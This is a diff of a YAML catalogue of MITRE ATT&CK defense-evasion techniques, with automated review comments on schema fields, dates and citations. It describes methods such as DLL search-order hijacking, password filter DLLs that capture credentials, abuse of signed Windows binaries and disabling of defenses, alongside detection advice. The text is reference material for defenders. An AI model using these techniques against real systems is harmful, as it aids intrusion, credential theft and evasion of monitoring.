- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
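Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from T1562.009 with no replacement value anywhere in the visible object, and the same thing happens to T1542.005, T1070.002, T1218.004, T1600.001 and T1055.003 further down. Other objects in the same diff keep or move their `x_mitre_attack_spec_version` (several to `3.2.0`), so the field is clearly still part of the schema; check whether the generator emits it elsewhere in these six objects or whether they simply lost it.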
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
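Review bot: the Deloitte reference URL gains an `/edit` suffix (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) together with a new Retrieved date of September 13, 2024. Drive `/edit` links can behave differently for readers who only have view access, so please confirm the link opens for an anonymous reader; if it does not, the previous suffix-less form (or `/view`) is the safer citation to keep.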
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
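Review bot: the InstallUtil description context reads `C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe` and `C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe`, followed by a lone `.` on its own line. The bare `v` is almost certainly a version placeholder whose angle-bracket content was stripped as if it were HTML when the text was imported. The hunk itself only changes `modified`, but since the generator is being re-run here it is worth checking whether it escapes `<...>` tokens in upstream descriptions instead of discarding them, and fixing the stray line break while at it.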
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
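Review bot: the new `Hexacorn DLL Hijacking` entry is complete, but the neighbouring `Microsoft Security Advisory 2269637` context line reads `Microsoft. (, May 23). Microsoft Security Advisory 2269637.`, with the year missing from the date. If that is how the upstream entry looks it should be reported there; if the importer is dropping the year, that is a generator bug worth fixing before the next regeneration.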
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
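Review bot: this hunk deletes the entire head of the T1556.002 object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the two `external_references` entries) and the next hunk re-adds all of them in a different key order, so the diff is almost entirely reordering noise around a one-line `modified` change and a version bump. If the generator can emit keys in a stable order (sorted, or the upstream order) the substantive changes will be visible at a glance on future regenerations.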
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
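Review bot: `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) is removed from T1556.002 in this hunk and not re-added, while T1562.009, T1542.005, T1218.004 and T1600.001 keep theirs elsewhere in this same diff. Dropping it is consistent with the object moving to `x_mitre_attack_spec_version: 3.2.0`, where upstream no longer maintains that field, but a single file mixing objects with and without it should be called out so consumers do not read the absence as "no elevated privileges required".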
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
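Review bot: the two tweet references on T1202 are rewritten from `twitter.com` to `x.com` with Retrieved dates updated to September 12, 2024, and the same rewrite is applied to the ItsReallyNick reference on T1036 later in the diff. Tweets are the least durable citation type in this file; since they were evidently re-checked, this is the right moment to add archived copies, and to double check that the `x.com` URLs resolve for a reader who is not logged in, otherwise the old hosts (which still redirect) were no worse.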
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
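Review bot: the T1562 description switches its block scalar indicator from `|-` to `|+`. `|+` keeps every trailing newline of the scalar, so this description now ends with whatever blank lines the upstream text carried, while every other description in this file uses `|-` (strip) or a quoted string. That looks like a YAML round-trip artifact of the source text ending in a newline rather than an intentional change; have the generator strip trailing whitespace before emitting so the indicator stays `|-` and the merged paragraph reads the same as its neighbours.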
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
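Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space inside its description (`" Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, ...`), which is also why this entry comes out double-quoted while the neighbouring `Emotet shutdown` entry is a plain scalar. Trim the author list before emitting, or fix the upstream entry, so the description starts with the first author's name and the quoting stays consistent across the reference list.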
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
